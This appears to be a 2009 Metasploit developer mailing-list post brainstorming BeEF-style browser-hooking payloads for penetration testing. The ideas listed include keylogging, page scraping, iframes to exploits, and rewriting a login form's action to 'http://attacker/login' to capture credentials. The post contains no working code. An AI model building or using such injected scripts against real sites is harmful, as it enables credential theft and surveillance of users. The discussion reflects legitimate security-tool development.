I've thought several times how helpful it would be to hook with
something similar to BeEF. Let you have multiple 'sessions' in the
background that you could pipe varoius exploits/aux mods to. I really
like the idea of BeEF, but haven't found it incredibly useful in
realworld pentesting scenarios. I wrote some BeEF modules that would
inject iframes pointed to msf / etc, but that was more of a novelty
than anything else. (You can still do the same thing normally.)
Perhaps just creating a generic javascript/html 'exploit' that merely
exposed a new set of BeEF-like payloads would work. The payload
handlers would let you have dynamic control of various javascript
functions that we could build to do things like:
- iframe to existing exploits of your choosing
- keylog
- page scraping
- find-and-replace kinds of things (like changing FORM
action=https://blah.com/login; method=POST to FORM
action=http://attacker/login; method=POST)
- custom javascript
Any other ideas?
On Tue, Feb 17, 2009 at 5:34 PM, Patrick Webster patr...@aushack.com wrote:
Anything specific in mind? :)
-Patrick
___
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
___
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
